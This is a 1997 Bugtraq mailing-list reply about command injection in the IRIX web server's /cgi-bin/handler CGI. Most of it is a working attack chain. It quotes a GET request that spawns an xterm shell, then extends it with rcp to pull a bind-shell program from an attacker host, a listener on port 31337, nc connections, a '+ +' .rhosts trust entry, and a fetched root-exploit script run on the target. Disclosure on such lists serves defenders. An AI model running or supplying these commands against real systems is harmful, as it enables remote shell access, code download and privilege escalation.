Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: CPSR 7: IRIX WWW Server
From: aaronb () j51 com (Aaron Bornstein)
Date: Thu, 24 Jul 1997 12:59:54 -0400


On Thu, 24 Jul 1997, Thomas Walter wrote:

[snip]
enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/;/usr/sbin/xwsh  -display  enemy:0  -e
/bin/csh|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%

And voila! - What else do you want? Any other programs to start? Just
try...


        Keep in mind that it isn't necessary to get everything done in one
command.  A string of two or three commands might sometimes be necessary
to get things moving.  For example:
enemy% whoami
evil_cracker
enemy% echo + + > .rhosts
enemy% nc victim.com 80
GET /cgi-bin/handler/;/usr/bsd/rcp      evil_cracker () enemy com:portshell        /tmp|?data=Download
enemy% nc victim.com 80
GET /cgi-bin/handler/;/tmp/portshell    31337|?data=Download
enemy% nc victim.com 31337
% whoami
nobody
% rcp evil_cracker () enemy com:irix_root_bug_of_the_week.sh \
./irbotw.sh ; ./irbotw.sh
#
[... or whatever ...]

"portshell" being a program that bound itself to a TCP port and executed a
shell upon receiving a connection.  Boom, shell access obtained under
whatever uid httpd is running as.  Or, one could even create a dummy
inetd.conf and run their own copy of inetd.  The possiblities are
virtually limitless.


                                                --Aaron


- -- --- ---- - Aaron Bornstein : aaronb at j51 dot com - ---- --- -- -
         Never let your schooling interfere with your education



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]